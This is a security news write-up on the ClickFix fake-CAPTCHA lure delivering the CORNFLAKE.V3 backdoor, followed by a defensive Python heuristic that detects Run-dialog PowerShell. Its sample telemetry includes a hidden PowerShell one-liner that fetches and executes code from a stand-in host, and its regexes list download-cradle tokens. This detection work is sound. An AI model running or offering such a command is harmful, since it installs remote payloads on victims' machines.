
ClickFix & fake CAPTCHAs facilitate CORNFLAKE.V3 deployment

Threat actors have been observed employing a deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3. Google-owned Mandiant has described this activity, tracked as UNC5518, as part of an access-as-a-service scheme that utilises fake CAPTCHA pages to lure users into providing initial access to their systems. This access is subsequently monetised by other threat groups. The initial infection vector, referred to as ClickFix, involves enticing users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box. The access provided by UNC5518 is believed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and deliver additional payloads.

The attack chain typically begins when a victim lands on a fake CAPTCHA verification page after interacting with search results that utilise search engine optimisation (SEO) poisoning or malicious advertisements. The user is then tricked into executing a malicious PowerShell command, which launches the next-stage dropper payload from a remote server. The newly downloaded script checks if it is running within a virtualised environment and ultimately activates CORNFLAKE.V3. Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of various payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server, with traffic proxied through Cloudflare tunnels to evade detection. 
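As an added example (not from the article or from Mandiant), the following Python heuristic scores process-creation telemetry for the ClickFix execution pattern described above: PowerShell launched from the Windows Run dialog (so a child of explorer.exe) with a command line that fetches and runs a next stage from a remote server. The event schema, field names and sample events are constructed for this example; map your own EDR or Sysmon fields onto them.

```python
import re

# Download-cradle tokens a pasted ClickFix one-liner needs to fetch the
# next-stage dropper from the remote server; all matched case-insensitively.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer)", re.I)
INVOKE_EXPR = re.compile(r"(\biex\b|invoke-expression)", re.I)  # pipe text to execution
EVASION_FLAGS = re.compile(  # hide the window or bypass policy
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|"
    r"-executionpolicy\s+bypass)", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)

def clickfix_indicators(event):
    """Return the indicator names matched by one process-creation event
    (dict with 'parent_image', 'image', 'command_line'; a constructed schema)."""
    hits = set()
    if not event.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return hits
    cmd = event.get("command_line", "")
    # A Run-dialog launch is a child of explorer.exe, which is unusual for
    # scripted, scheduled or management-tool PowerShell.
    if event.get("parent_image", "").lower().endswith("explorer.exe"):
        hits.add("parent_explorer")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.add("download_cradle")
    if INVOKE_EXPR.search(cmd):
        hits.add("invoke_expression")
    if EVASION_FLAGS.search(cmd):
        hits.add("evasion_flags")
    if URL.search(cmd):
        hits.add("remote_url")
    return hits

def is_clickfix_like(event, threshold=3):
    """Flag PowerShell spawned by explorer.exe with enough stage-fetch
    indicators; raise the threshold to trade recall for less noise."""
    hits = clickfix_indicators(event)
    return "parent_explorer" in hits and len(hits) >= threshold

# Constructed sample telemetry, not real indicators from the article.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/verify).Content"'},
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]
```

Running `is_clickfix_like` over `SAMPLE_EVENTS` flags the first record and not the second; the explorer.exe parent requirement is what keeps ordinary administrative PowerShell out of the alert.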
